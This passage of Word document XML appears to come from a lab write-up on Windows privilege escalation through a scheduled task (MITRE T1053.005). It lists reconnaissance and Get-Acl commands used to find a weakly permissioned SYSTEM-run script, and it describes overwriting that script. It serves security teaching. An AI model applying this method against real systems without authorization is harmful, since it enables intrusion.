          <w:p w14:paraId="756B451D" w14:textId="558EBB1F" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="14301521" w:rsidP="14301521">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F476731" w14:textId="2E750263" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="14301521" w:rsidP="14301521">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>T1053</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1499" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="614E8DCD" w14:textId="09F2C2B9" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="14301521" w:rsidP="14301521">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Scheduled Task/Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DA2EADC" w14:textId="7A005F2A" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="14301521" w:rsidP="14301521">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1498" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E18B74B" w14:textId="6CC20C8C" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="14301521" w:rsidP="14301521">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1712" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="653C62A7" w14:textId="3F31DAE9" w:rsidR="00500AD9" w:rsidRPr="009F3FA8" w:rsidRDefault="14301521" w:rsidP="14301521">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="282F26EB" w14:textId="67308820" w:rsidR="14301521" w:rsidRDefault="14301521" w:rsidP="14301521">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E3582C" w14:textId="4FABD580" w:rsidR="14301521" w:rsidRDefault="14301521" w:rsidP="14301521">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Technique Justification:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This incident demonstrates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T1053.005</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the adversary identifies a pre-existing scheduled task that executes a script with SYSTEM privileges. By exploiting weak file permissions, the adversary overwrites the script with malicious code, causing the Task Scheduler to execute the payload in an elevated security context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5292C67B" w14:textId="0B2ACD12" w:rsidR="14301521" w:rsidRDefault="14301521" w:rsidP="14301521">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599EF856" w14:textId="53A21461" w:rsidR="00ED5F9B" w:rsidRDefault="00ED5F9B" w:rsidP="00ED5F9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc220896688"/>
      <w:commentRangeStart w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Attack Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:commentRangeEnd w:id="25"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="25"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC5039" w14:textId="77777777" w:rsidR="00656532" w:rsidRPr="003E49BF" w:rsidRDefault="0092402D" w:rsidP="00EA2F9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>irstly, I began by performing basic reconnaissance of the file system to find potential avenues for privilege escalation. I used the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11492C0D" w14:textId="77777777" w:rsidR="00656532" w:rsidRPr="003E49BF" w:rsidRDefault="008F7197" w:rsidP="00656532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>ls C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA9085" w14:textId="77777777" w:rsidR="00656532" w:rsidRPr="003E49BF" w:rsidRDefault="00656532" w:rsidP="00656532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DC2667F" w14:textId="3F2BB48E" w:rsidR="008F7197" w:rsidRPr="003E49BF" w:rsidRDefault="008F7197" w:rsidP="00656532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">to list the root directory, which immediately revealed a non-standard folder named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>TaskScripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>. Seeing a custom folder like this in the root directory is a significant red flag, as such folders often contain automated scripts that may not have the same strict security permissions as standard Windows system directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0C841" w14:textId="77777777" w:rsidR="00656532" w:rsidRPr="003E49BF" w:rsidRDefault="00656532" w:rsidP="00656532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4302FC" w14:textId="08D6512C" w:rsidR="00656532" w:rsidRPr="003E49BF" w:rsidRDefault="00656532" w:rsidP="00656532">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F4AD5F" wp14:editId="4F02F45E">
            <wp:extent cx="3710940" cy="1492250"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="449818871" name="Picture 2"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19796" name="Picture 2" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="42958"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3712090" cy="1492712"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="030034F0" w14:textId="77777777" w:rsidR="00EA2F9F" w:rsidRPr="003E49BF" w:rsidRDefault="00EA2F9F" w:rsidP="008F7197">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41045CBD" w14:textId="77777777" w:rsidR="00656532" w:rsidRPr="003E49BF" w:rsidRDefault="008F7197" w:rsidP="008F7197">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">I then navigated into the directory using the command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A12B6C1" w14:textId="77777777" w:rsidR="00656532" w:rsidRPr="003E49BF" w:rsidRDefault="008F7197" w:rsidP="008F7197">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>ls C:\TaskScripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39895FED" w14:textId="77777777" w:rsidR="00656532" w:rsidRPr="003E49BF" w:rsidRDefault="00656532" w:rsidP="008F7197">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E2C9EA" w14:textId="5AF9BB0A" w:rsidR="008F7197" w:rsidRPr="003E49BF" w:rsidRDefault="008F7197" w:rsidP="008F7197">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">where I identified a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>cleanup.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>. Since this script appeared to be part of an automated routine, I proceeded to investigate if it was being executed by a high-privilege account and if its permissions were insecure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24EBD2" w14:textId="77777777" w:rsidR="004936D8" w:rsidRPr="003E49BF" w:rsidRDefault="004936D8" w:rsidP="008F7197">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D8D067" w14:textId="53C958BA" w:rsidR="004936D8" w:rsidRPr="008F7197" w:rsidRDefault="004936D8" w:rsidP="004936D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E5DC5CA" wp14:editId="3A9E68AA">
            <wp:extent cx="3710940" cy="1117467"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6985"/>
            <wp:docPr id="806119796" name="Picture 2"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19796" name="Picture 2" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId38"/>
                    <a:srcRect t="57285"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3712090" cy="1117813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A43B41" w14:textId="77777777" w:rsidR="008F7197" w:rsidRPr="003E49BF" w:rsidRDefault="008F7197" w:rsidP="0092402D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DAC7B2" w14:textId="77777777" w:rsidR="0092402D" w:rsidRPr="003E49BF" w:rsidRDefault="0092402D" w:rsidP="0092402D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65268C32" w14:textId="2C1053F7" w:rsidR="14301521" w:rsidRPr="003E49BF" w:rsidRDefault="0028130A" w:rsidP="14301521">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Once I knew which file the system was using, I needed to see if I could change it. We need this step to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prove that the system was weak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> before we try to attack it. In simple terms, we are looking for a "door" that was left unlocked.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>I used the command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ls C:\TaskScripts\cleanup.ps1 | Get-Acl | Select-Object -ExpandProperty Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t>This command is like checking the security guest list for a specific file. It points to the script (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Consolas" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>), asks the computer for its list of "who is allowed to do what" (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Consolas" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Get-Acl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>), and then pulls out the detailed names and rules (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Consolas" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Select-Object -ExpandProperty Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA8665" w14:textId="4781EE7B" w:rsidR="7F2C5844" w:rsidRPr="003E49BF" w:rsidRDefault="7F2C5844" w:rsidP="7F2C5844">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E05F20B" w14:textId="77777777" w:rsidR="00650AF2" w:rsidRPr="003E49BF" w:rsidRDefault="00620DCD" w:rsidP="00620DCD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A2DC34D" wp14:editId="626E7ADE">
            <wp:extent cx="5809201" cy="380559"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="454551900" name="Picture 3"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32181" name="Picture 3" descr="A screenshot of a computer  AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="91389"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5948320" cy="389673"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8F841" w14:textId="77777777" w:rsidR="00650AF2" w:rsidRPr="003E49BF" w:rsidRDefault="00650AF2" w:rsidP="00620DCD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7DE614" w14:textId="06E22DDB" w:rsidR="7F2C5844" w:rsidRPr="003E49BF" w:rsidRDefault="00DB43DC" w:rsidP="00620DCD">
      <w:pPr>
        <w:jc w:val="center"/>
